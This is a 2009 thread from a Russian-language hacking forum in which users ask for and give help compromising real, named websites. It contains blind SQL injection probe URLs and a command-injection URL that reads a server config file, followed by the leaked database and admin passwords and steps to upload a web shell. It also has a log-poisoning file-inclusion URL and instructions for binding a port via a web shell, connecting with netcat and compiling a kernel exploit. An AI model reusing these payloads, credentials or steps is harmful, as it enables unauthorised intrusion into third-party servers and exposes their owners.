ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.07.2009, 18:44
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 16
Провел на форуме:
64853
Репутация:
7
|
|
Так я и грю, что таблицы не подобрать! а _members оставил чтобы инъект было видно!
information_schema не доступна. Просто может кто этот CMS Знает и таблицу юзеров подскажет?
Или какой другой вариант пробывать?
|
|
|
01.07.2009, 19:17
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от softrix
Так я и грю, что таблицы не подобрать! а _members оставил чтобы инъект было видно!
information_schema не доступна. Просто может кто этот CMS Знает и таблицу юзеров подскажет?
Или какой другой вариант пробывать?
Код:
http://www.rukso.ru/news/own/999190+or+1=0 - шаг 1
http://www.rukso.ru/news/own/999190+or+1=1 - шаг 2
http://www.rukso.ru/news/own/999190+or+1=1+and+substring(version(),1,1)=4 - шаг 3
Дальше хз, вроде слепая просто
information_schema недоступна
Дык 4-ая ветка, её там и нет, только брут, по определению
Последний раз редактировалось Pashkela; 01.07.2009 в 19:20..
|
|
|
|
01.07.2009, 23:19
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
1.Здрасте. Короче вот http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
это выполнение команд на серве. я узнал что на серве есть PHP.
У меня есть шелл на народе.
Помогите залить шелл через выплнение команд. т.е. надо создать файл с расш. пхп и запусить? помогите плиз.
и подскажите дерикторию плиз в которой сайт лежит
ЗЫ деф. не буду. чесн слово.
2. Помогите заюзать InetCrack чтобы в данном логе осталась моя запись например PRIVET?
http://www.lohuis.ro/index.php?page=../../../../../../../../../../var/log/apache/error_log%00
Последний раз редактировалось nub-hacker; 02.07.2009 в 00:29..
|
|
|
|
02.07.2009, 01:01
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Тэк.... Вообщем идём сюда :http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc= |cat%20../htdocs/admin/config.inc.php| там подглядываем такое:
Код:
$login["server"]="localhost";
$login["user"]=$DBUser;
$login["password"]=$DBPass;
$login["database"]="insotag";
$ftpuser=$login["user"];
$ftppass=$login["password"];
$ftpserver="www.insolvenzrechtstag.de";
$ftppfad="www/htdocs/pdfdoc";
$webpfad="../pdfdoc";
$adminuser="insotag";
$adminpass="hoersaal";
$admintemplate="../Templates/administration.dwt";
$erfassentemplate="../Templates/erfassen.dwt";
$bearbeitentemplate="../Templates/bearbeiten.dwt";
$loeschentemplate="../Templates/loeschen.dwt";
Отсюда видно, что $adminuser="insotag";
$adminpass="hoersaal";
Потом идём сюда: http://www.insolvenzrechtstag.de/admin/ вводим логин и пароль, проходим в http://www.insolvenzrechtstag.de/admin/index.php?modus=erfassen и заливаем шелл... так как я в немецком нини то... 
Последний раз редактировалось Ch3ck; 02.07.2009 в 01:26..
|
|
|
|
02.07.2009, 08:59
|
|
Новичок
Регистрация: 11.06.2008
Сообщений: 29
Провел на форуме:
340480
Репутация:
11
|
|
Можно ли что-то сделать с этим запросом в скрипте
PHP код:
$row = mysql_query("INSERT INTO table (id,text) VALUES ('$id', '$text')");?
Допустим вставить свои данные в другую таблицу?
Переменные id и text никак не фильтруются, на сервере включены magic quotes, mysql 5. |
|
|
|
02.07.2009, 09:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от SeTM
Можно ли что-то сделать с этим запросом в скрипте
PHP код:
$row = mysql_query("INSERT INTO table (id,text) VALUES ('$id', '$text')");?
Допустим вставить свои данные в другую таблицу?
Переменные id и text никак не фильтруются, на сервере включены magic quotes, mysql 5. при включенных magic_quotes нельзя.
|
|
|
|
02.07.2009, 12:49
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Подскажите плиз. имеется WEB Shell на серваке. называется WSO2.
На милворе нашол сплоит на C под этот сервак. Как через вебшелл запустить этот сплоит?
http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29
add
// резервисты пришли, посмотрели и ушли 
Последний раз редактировалось nub-hacker; 02.07.2009 в 12:58..
|
|
|
|
02.07.2009, 13:07
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
nub-hacker
На форуме куча статей, по запуску сплоитов в том числе.
Будешь продолжать ничего не читая задавать вопросы и переносить сюда тему PHP инъекций с просьбой залить шелл , этот мультиакк тоже уйдёт в бан.
Мне даже в модцп не нужно лезть, что-бы понять кто ты.
|
|
|
|
02.07.2009, 13:08
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от nub-hacker
Подскажите плиз. имеется WEB Shell на серваке. называется WSO2.
На милворе нашол сплоит на C под этот сервак. Как через вебшелл запустить этот сплоит?
Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.
|
|
|
|
02.07.2009, 14:05
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Народ,чем к бд приконнектиться ещё можно ?
SQL Manager:
Can't connect
Client does not support authentication protocol requested by server; consider upgrading MySQL client
Выдаёт мой любимый с99 модификэйтед )))).
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
